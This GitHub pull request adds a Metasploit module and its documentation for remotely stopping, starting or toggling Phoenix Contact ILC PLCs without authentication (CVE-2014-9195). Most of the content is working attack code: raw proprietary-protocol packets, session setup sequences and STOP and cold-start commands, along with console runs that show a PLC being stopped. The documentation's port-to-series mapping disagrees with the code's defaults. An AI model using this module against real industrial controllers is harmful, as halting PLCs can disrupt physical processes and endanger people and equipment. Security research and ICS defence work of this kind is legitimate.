### PR TITLE
Added phoenix_command.rb

### DIFF
--- a/documentation/modules/auxiliary/admin/scada/phoenix_command.md
+++ b/documentation/modules/auxiliary/admin/scada/phoenix_command.md
@@ -2,23 +2,23 @@ PhoenixContact Programmable Logic Controllers are built are using a variant of P
  Communicating using a proprietary protocol over ports TCP/1962 and TCP/41100 or TCP/20547.
 It allows a remote user to read out the PLC Type, Firmware and Build number on port TCP/1962.
 And also to read out the CPU State (Running or Stopped) AND start or stop the CPU on 
- port TCP/20547 (confirmed for the PLC series ILC 15x and 17x)
- or   TCP/41100 (confirmed for the ILC 39x series)
- other series may or may not work, a very big chance that they will
+port TCP/20547 (confirmed for the PLC series ILC 15x and 17x)
+or   TCP/41100 (confirmed for the ILC 39x series)
+other series may or may not work, a very big chance that they will
 
 ## Vulnerable Application
 
 This is a hardware zero-day vulnerability that CANNOT be patched, the only mittigation is pulling the plug (literally),
- adding a separate network in front of it (Firewall, Router, IDS, IPS, network segmentation, etc...)
- or not allowing bad people on your network 
+adding a separate network in front of it (Firewall, Router, IDS, IPS, network segmentation, etc...)
+or not allowing bad people on your network .
  
 In general most, if not all, PLC's (computers that control engines, robots, conveyor belts, sensors, camera's, doorlocks, CRACs ...)
- have this vulnerability where, using their own tools, remote configuration and programming can be done *WITHOUT* authentication
- Investigators and underground hackers are just now creating simple tools to convert the often proprietary protocols into (simple) scripts
+have this vulnerability where, using their own tools, remote configuration and programming can be done *WITHOUT* authentication. 
+Investigators and underground hackers are just now creating simple tools to convert the often proprietary protocols into (simple) scripts.
  
 The most important word here is proprietary. Right now the only thing stopping very bad stuff from happening.
- PhoenixContact uses an (unnamed?) low-level protocol for connection, information exchange and configuration of its PLC devices
- This script utilises that protocol for finding information and switching the PLC mode from STOP to RUN and vice versa
+PhoenixContact uses an (unnamed?) low-level protocol for connection, information exchange and configuration of its PLC devices.
+This script utilises that protocol for finding information and switching the PLC mode from STOP to RUN and vice versa
 
 ## Verification Steps
 

--- a/documentation/modules/auxiliary/admin/scada/phoenix_command.md
+++ b/documentation/modules/auxiliary/admin/scada/phoenix_command.md
@@ -1,0 +1,109 @@
+PhoenixContact Programmable Logic Controllers are built are using a variant of ProConOS. 
+ Communicating using a proprietary protocol over ports TCP/1962 and TCP/41100 or TCP/20547.
+It allows a remote user to read out the PLC Type, Firmware and Build number on port TCP/1962.
+And also to read out the CPU State (Running or Stopped) AND start or stop the CPU on 
+ port TCP/20547 (confirmed for the PLC series ILC 15x and 17x)
+ or   TCP/41100 (confirmed for the ILC 39x series)
+ other series may or may not work, a very big chance that they will
+
+## Vulnerable Application
+
+This is a hardware zero-day vulnerability that CANNOT be patched, the only mittigation is pulling the plug (literally),
+ adding a separate network in front of it (Firewall, Router, IDS, IPS, network segmentation, etc...)
+ or not allowing bad people on your network 
+ 
+In general most, if not all, PLC's (computers that control engines, robots, conveyor belts, sensors, camera's, doorlocks, CRACs ...)
+ have this vulnerability where, using their own tools, remote configuration and programming can be done *WITHOUT* authentication
+ Investigators and underground hackers are just now creating simple tools to convert the often proprietary protocols into (simple) scripts
+ 
+The most important word here is proprietary. Right now the only thing stopping very bad stuff from happening.
+ PhoenixContact uses an (unnamed?) low-level protocol for connection, information exchange and configuration of its PLC devices
+ This script utilises that protocol for finding information and switching the PLC mode from STOP to RUN and vice versa
+
+## Verification Steps
+
+The following demonstrates a basic scenario, we "found" two devices with an open port TCP/1962:
+
+```
+msf > search phoenix
+msf > use auxiliary/admin/scada/phoenix_command
+msf auxiliary(phoenix_command) > set RHOST 10.66.56.12
+RHOST => 10.66.56.12
+msf auxiliary(phoenix_command) > run
+
+[*] 10.66.56.12:0 - PLC Type = ILC 150 GSM/GPRS
+[*] 10.66.56.12:0 - Firmware = 3.71
+[*] 10.66.56.12:0 - Build    = 07/13/11 12:00:00
+[*] 10.66.56.12:0 - ------------------------------------
+[*] 10.66.56.12:0 - --> Detected 15x/17x series, getting current CPU state:
+[*] 10.66.56.12:0 - CPU Mode = RUN
+[*] 10.66.56.12:0 - ------------------------------------
+[*] 10.66.56.12:0 - --> No action specified (NOOP), stopping here
+[*] Auxiliary module execution completed
+
+msf auxiliary(phoenix_command) > set RHOST 10.66.56.72
+RHOST => 10.66.56.72
+msf auxiliary(phoenix_command) > set ACTION REV
+ACTION => REV
+msf auxiliary(phoenix_command) > run
+[*] 10.66.56.72:0 - PLC Type = ILC 390 PN 2TX-IB
+[*] 10.66.56.72:0 - Firmware = 3.95
+[*] 10.66.56.72:0 - Build    = 02/14/11 14:04:47
+[*] 10.66.56.72:0 - ------------------------------------
+[*] 10.66.56.72:0 - --> Detected 39x series, getting current CPU state:
+[*] 10.66.56.72:0 - CPU Mode = RUN
+[*] 10.66.56.72:0 - ------------------------------------
+[*] 10.66.56.72:0 - --> Sending STOP now
+[*] 10.66.56.72:0 - CPU Mode = STOP
+[*] Auxiliary module execution completed
+```
+
+## Options
+```
+msf auxiliary(phoenix_command) > show options
+
+Module options (auxiliary/admin/scada/phoenix_command):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   ACTION     NOOP             yes       PLC CPU action, REV means reverse state (Accepted: STOP, START, REV, NOOP)
+   RHOST                       yes       The target address
+   RINFOPORT  1962             yes       Set info port
+   RPORT                       no        Set action port, will try autodetect when not set
+```
+
+By default, the module only reads out the PLC Type, Firmware version, Build date and current CPU mode (RUNning or STOPped)
+
+The first three pieces of data (Type, Firmware & Build) are always found on port TCP/1962 
+ (there is no way of changing that port on the PLC, so also no reason to change the 'RINFOPORT' option)
+
+ The CPU mode uses a TCP port depending on the PLC Type, the module will automatically detect the type and port to use,
+but can be overridden with the 'RPORT' option, however no real reason to configure it.
+--> If 'RPORT' is set for some reason (e.g. because of an earlier "setg RPORT" command), it can be unset with:
+```
+msf auxiliary(phoenix_command) > unset RPORT
+Unsetting RPORT...
+```
+
+**The ACTION option**
+Action only has four (4) possible values:
+
+By default, the module will do nothing to the PLC, therefore No Operation or 'NOOP'
+```
+msf auxiliary(phoenix_command) > set ACTION NOOP
+```
+
+The PLC can be forced to go into STOP mode, meaning it stops all execution and all outputs are set to low
+```
+msf auxiliary(phoenix_command) > set ACTION STOP
+```
+
+The PLC can be forced to go into RUN mode, it keeps running it was or it will start executing its current boot programming
+```
+msf auxiliary(phoenix_command) > set ACTION START
+```
+
+The module can also just read out the CPU mode and then reverse whatever it finds, RUN becomes STOP, STOP becomes RUN
+```
+msf auxiliary(phoenix_command) > set ACTION REV
+```

--- a/modules/auxiliary/admin/scada/phoenix_command.rb
+++ b/modules/auxiliary/admin/scada/phoenix_command.rb
@@ -1,0 +1,228 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+  include Rex::Socket::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'PhoenixContact PLC Remote START/STOP Command',
+      'Version'       => '1',
+      'Description'   => %q{
+        PhoenixContact Programmable Logic Controllers are built upon a variant of
+        ProConOS. Communicating using a proprietary protocol over ports TCP/1962
+        and TCP/41100 or TCP/20547.
+        It allows a remote user to read out the PLC Type, Firmware and
+         Build number on port TCP/1962.
+        And also to read out the CPU State (Running or Stopped) AND start
+         or stop the CPU on port TCP/20547 (confirmed ILC 15x and 17x series)
+         or on port TCP/41100 (confirmed ILC 39x series)
+      },
+      'Author'         => 'Tijl Deneut <tijl.deneut[at]howest.be>',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://github.com/tijldeneut/ICSSecurityScripts' ],
+          [ 'CVE', '2014-9195']
+        ],
+      'DisclosureDate' => 'May 20 2015'
+      ))
+    register_options(
+      [
+        OptEnum.new('ACTION', [true, 'PLC CPU action, REV means reverse current CPU state', 'NOOP',
+          [
+            'STOP',
+            'START',
+            'REV',
+            'NOOP'
+          ]
+        ]),
+        OptPort.new('RINFOPORT', [true, 'Set info port', 1962 ]),
+        OptPort.new('RPORT', [false, 'Set action port, will try autodetect when not set' ])
+      ], self.class)
+
+  end
+
+  # Here comes the code, hang on to your pants
+  def bin_to_hex(s)
+    s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+  end
+
+  def hex_to_bin(s)
+    s.scan(/../).map { |x| x.hex.chr }.join
+  end
+
+  def send_recv_once(data)
+    buf = ''
+    begin
+      sock.put(data)
+      buf = sock.get_once || ''
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    end
+
+    bin_to_hex(buf)
+  end
+
+  def get_info(rhost, rport)
+    connect(true, {'RHOST'=>rhost, 'RPORT'=>rport})
+    code = send_recv_once("\x01\x01\x00\x1a\x00^\x00\x00\x00\x00\x00\x03\x00\x0cIBETH01N0_M\x00")[34..35]
+    send_recv_once("\x01\x05\x00\x16\x00\x5f\x00\x00\x08\xef\x00" + hex_to_bin(code) + "\x00\x00\x00\x22\x00\x04\x02\x95\x00\x00")
+    data = send_recv_once("\x01\x06\x00\x0e\x00\x61\x00\x00\x88\x11\x00" + hex_to_bin(code) + "\x04\x00")
+    disconnect
+    plctype = hex_to_bin(data[60..99])
+    print_status("PLC Type = " + plctype)
+    print_status("Firmware = " + hex_to_bin(data[132..139]))
+    print_status("Build    = " + hex_to_bin(data[158..174]) + " " + hex_to_bin(data[182..199]))
+    print_status('------------------------------------')
+    plctype
+  end
+
+  def init_phase1
+    send_recv_once("\x01\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\xcf\xffAde.Remoting.Services.IProConOSControlService2\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IProConOSControlService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDataAccessService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\xd4\xffAde.Remoting.Services.IDeviceInfoService2\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDeviceInfoService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00%\x00\x00\x00\x00\x00\x00\x00\xd9\xffAde.Remoting.Services.IForceService2\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IForceService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\xce\xffAde.Remoting.Services.ISimpleFileAccessService3\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.ISimpleFileAccessService2\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\xd4\xffAde.Remoting.Services.IDeviceInfoService2\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDeviceInfoService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\xd4\xffAde.Remoting.Services.IDataAccessService3\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDataAccessService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\xd4\xffAde.Remoting.Services.IDataAccessService2\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00\xd5\xffAde.Remoting.Services.IBreakpointService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\xd6\xffAde.Remoting.Services.ICallstackService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00%\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IDebugService2\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\xcf\xffAde.Remoting.Services.IProConOSControlService2\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.IProConOSControlService\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\xce\xffAde.Remoting.Services.ISimpleFileAccessService3\x00")
+    send_recv_once("\x01\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00Ade.Remoting.Services.ISimpleFileAccessService2\x00")
+    send_recv_once("\x01\x00\x02\x00\x00\x00\x0e\x00\x03\x00\x03\x00\x00\x00\x00\x00\x05\x00\x00\x00\x12@\x13@\x13\x00\x11@\x12\x00")
+  end
+
+  def init_phase2
+    send_recv_once("\xcc\x01\x00\r\xc0\x01\x00\x00\xd5\x17")
+    send_recv_once("\xcc\x01\x00\x0b@\x02\x00\x00G\xee")
+    send_recv_once("\xcc\x01\x00[@\x03\x1c\x00\x01\x00\x00\x00\x1c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd7\x9a")
+    send_recv_once("\xcc\x01\x00[@\x04\x1c\x00\x01\x00\x00\x00\x1c\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xeaC")
+    send_recv_once("\xcc\x01\x00\x06@\x05\x00\x006\x1e")
+    send_recv_once("\xcc\x01\x00\x07@\x06\x10\x00&u\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc6\x82")
+  end
+
+  def get_state1(data)
+   if data[48..49] == '03'
+     state = 'RUN'
+   elsif data[48..49] == '07'
+     state = 'STOP'
+   elsif data[49..49] == '00'
+     state = 'ON'
+   else
+     print_error('CPU State not detected, full result is ' + data)
+     return
+   end
+   state
+  end
+
+  def get_state2(data)
+    if data[16..17] == '04'
+      state = 'STOP'
+    elsif data[16..17] == '02'
+      state = 'RUN'
+    else
+      print_error('CPU State not detected, full result is ' + data)
+      return
+    end
+    state
+  end
+
+  def get_cpu(rhost, rport, devicetype)
+    connect(true, {'RHOST'=>rhost, 'RPORT'=>rport})
+    state = 'unknown'
+    if devicetype == '15x'
+      init_phase1
+      ## KeepAlive packet
+      send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")
+      ## Query packet
+      data = send_recv_once("\x01\x00\x02\x00\x00\x00\x08\x00\x03\x00\x03\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x40\x0b\x40")
+      state = get_state1(data)
+    elsif devicetype == '39x'
+      init_phase2
+      data = send_recv_once("\xcc\x01\x00\x0f@\x07\x00\x00\xea\xfa")
+      state = get_state2(data)
+    end
+    disconnect
+    print_status('CPU Mode = ' + state)
+    state
+  end
+
+  def set_cpu(rhost, rport, action, state, devicetype)
+    connect(true, {'RHOST'=>rhost, 'RPORT'=>rport})
+    if devicetype == '15x'
+      init_phase1 ## Several packets (21)
+      send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")
+      if action == 'START' or (action == 'REV' and state == 'STOP')
+        print_status('--> Sending COLD start now')
+        send_recv_once("\x01\x00\x02\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x01\x00")
+      else
+        print_status('--> Sending STOP now')
+        send_recv_once("\x01\x00\x02\x00\x00\x00\x00\x00\x01\x00\x07\x00\x00\x00\x00\x00")
+      end
+    elsif devicetype == '39x'
+      init_phase2 ## Several packets (6)
+      if action == 'START' or (action == 'REV' and state == 'STOP')
+        print_status('--> Sending COLD start now')
+        send_recv_once("\xcc\x01\x00\x04\x40\x0e\x00\x00\x18\x21")
+      else
+        print_status('--> Sending STOP now')
+        send_recv_once("\xcc\x01\x00\x01\x40\x0e\x00\x00\x4c\x07")
+      end
+    else
+      print_error('Unknown device type')
+      return
+    end
+    sleep(1) ## It takes a second for a PLC to start
+    get_cpu(rhost, rport, devicetype)
+    disconnect
+  end
+
+  def run
+    rhost = datastore['RHOST']
+    action = datastore['ACTION']
+    ractionport = datastore['RPORT']
+
+    device = get_info(rhost, datastore['RINFOPORT'])
+
+    if device.start_with?('ILC 15') or device.start_with?('ILC 17')
+      devicetype = '15x'
+      print_status('--> Detected 15x/17x series, getting current CPU state:')
+      ractionport == 0  ? (rport = 41100) : (rport = ractionport)
+    elsif device.start_with?('ILC 39')
+      devicetype = '39x'
+      print_status('--> Detected 39x series, getting current CPU state:')
+      ractionport == 0 ? (rport = 20547) : (rport = ractionport)
+    else
+      print_error('Only ILC and (some) RFC devices are supported.')
+      return
+    end
+
+    state = get_cpu(rhost, rport, devicetype)
+    print_status('------------------------------------')
+
+    if action == "NOOP"
+      print_status('--> No action specified (' + action  + '), stopping here')
+      return
+    end
+
+    set_cpu(rhost, rport, action, state, devicetype)
+  end
+end
+

--- a/modules/auxiliary/admin/scada/phoenix_command.rb
+++ b/modules/auxiliary/admin/scada/phoenix_command.rb
@@ -30,8 +30,7 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://github.com/tijldeneut/ICSSecurityScripts' ],
           [ 'CVE', '2014-9195']
         ],
-      'DisclosureDate' => 'May 20 2015'
-      ))
+      'DisclosureDate' => 'May 20 2015'))
     register_options(
       [
         OptEnum.new('ACTION', [true, 'PLC CPU action, REV means reverse current CPU state', 'NOOP',
@@ -40,12 +39,11 @@ class MetasploitModule < Msf::Auxiliary
             'START',
             'REV',
             'NOOP'
-          ]
-        ]),
+          ]]),
         OptPort.new('RINFOPORT', [true, 'Set info port', 1962 ]),
         OptPort.new('RPORT', [false, 'Set action port, will try autodetect when not set' ])
-      ], self.class)
-
+      ], self.class
+    )
   end
 
   # Here comes the code, hang on to your pants

--- a/modules/auxiliary/admin/scada/phoenix_command.rb
+++ b/modules/auxiliary/admin/scada/phoenix_command.rb
@@ -6,7 +6,6 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::Tcp
   include Rex::Socket::Tcp
 
@@ -71,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_info(rhost, rport)
-    connect(true, {'RHOST'=>rhost, 'RPORT'=>rport})
+    connect(true, 'RHOST' => rhost, 'RPORT' => rport)
     code = send_recv_once("\x01\x01\x00\x1a\x00^\x00\x00\x00\x00\x00\x03\x00\x0cIBETH01N0_M\x00")[34..35]
     send_recv_once("\x01\x05\x00\x16\x00\x5f\x00\x00\x08\xef\x00" + hex_to_bin(code) + "\x00\x00\x00\x22\x00\x04\x02\x95\x00\x00")
     data = send_recv_once("\x01\x06\x00\x0e\x00\x61\x00\x00\x88\x11\x00" + hex_to_bin(code) + "\x04\x00")
@@ -119,17 +118,17 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_state1(data)
-   if data[48..49] == '03'
-     state = 'RUN'
-   elsif data[48..49] == '07'
-     state = 'STOP'
-   elsif data[49..49] == '00'
-     state = 'ON'
-   else
-     print_error('CPU State not detected, full result is ' + data)
-     return
-   end
-   state
+    if data[48..49] == '03'
+      state = 'RUN'
+    elsif data[48..49] == '07'
+      state = 'STOP'
+    elsif data[49..49] == '00'
+      state = 'ON'
+    else
+      print_error('CPU State not detected, full result is ' + data)
+      return
+    end
+    state
   end
 
   def get_state2(data)
@@ -145,7 +144,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_cpu(rhost, rport, devicetype)
-    connect(true, {'RHOST'=>rhost, 'RPORT'=>rport})
+    connect(true, 'RHOST' => rhost, 'RPORT' => rport)
     state = 'unknown'
     if devicetype == '15x'
       init_phase1
@@ -165,11 +164,11 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def set_cpu(rhost, rport, action, state, devicetype)
-    connect(true, {'RHOST'=>rhost, 'RPORT'=>rport})
+    connect(true, 'RHOST' => rhost, 'RPORT' => rport)
     if devicetype == '15x'
       init_phase1 ## Several packets (21)
       send_recv_once("\x01\x00\x02\x00\x00\x00\x1c\x00\x03\x00\x03\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x07\x00\x05\x00\x06\x00\x08\x00\x10\x00\x02\x00\x11\x00\x0e\x00\x0f\x00\r\x00\x16@\x16\x00")
-      if action == 'START' or (action == 'REV' and state == 'STOP')
+      if action == 'START' || (action == 'REV' && state == 'STOP')
         print_status('--> Sending COLD start now')
         send_recv_once("\x01\x00\x02\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x01\x00")
       else
@@ -178,7 +177,7 @@ class MetasploitModule < Msf::Auxiliary
       end
     elsif devicetype == '39x'
       init_phase2 ## Several packets (6)
-      if action == 'START' or (action == 'REV' and state == 'STOP')
+      if action == 'START' || (action == 'REV' && state == 'STOP')
         print_status('--> Sending COLD start now')
         send_recv_once("\xcc\x01\x00\x04\x40\x0e\x00\x00\x18\x21")
       else
@@ -201,10 +200,10 @@ class MetasploitModule < Msf::Auxiliary
 
     device = get_info(rhost, datastore['RINFOPORT'])
 
-    if device.start_with?('ILC 15') or device.start_with?('ILC 17')
+    if device.start_with?('ILC 15', 'ILC 17')
       devicetype = '15x'
       print_status('--> Detected 15x/17x series, getting current CPU state:')
-      ractionport == 0  ? (rport = 41100) : (rport = ractionport)
+      ractionport == 0 ? (rport = 41100) : (rport = ractionport)
     elsif device.start_with?('ILC 39')
       devicetype = '39x'
       print_status('--> Detected 39x series, getting current CPU state:')
@@ -218,11 +217,10 @@ class MetasploitModule < Msf::Auxiliary
     print_status('------------------------------------')
 
     if action == "NOOP"
-      print_status('--> No action specified (' + action  + '), stopping here')
+      print_status("--> No action specified (#{action}), stopping here")
       return
     end
 
     set_cpu(rhost, rport, action, state, devicetype)
   end
 end
-


### PR DESCRIPTION
Add a PLC exploit module, extended version of this exploit-db script:
https://www.exploit-db.com/exploits/37066/
This module enumerates a PLC and Stops, Starts or Reverses the running state.
Works on most common PhoenixContact PLCs...
- [x] Start `msfconsole`
- [x] `use auxiliary/admin/scada/phoenix_command`
- [x] `set rhost 10.1.2.3`
- [x] `set action REV`
- [x] `run`
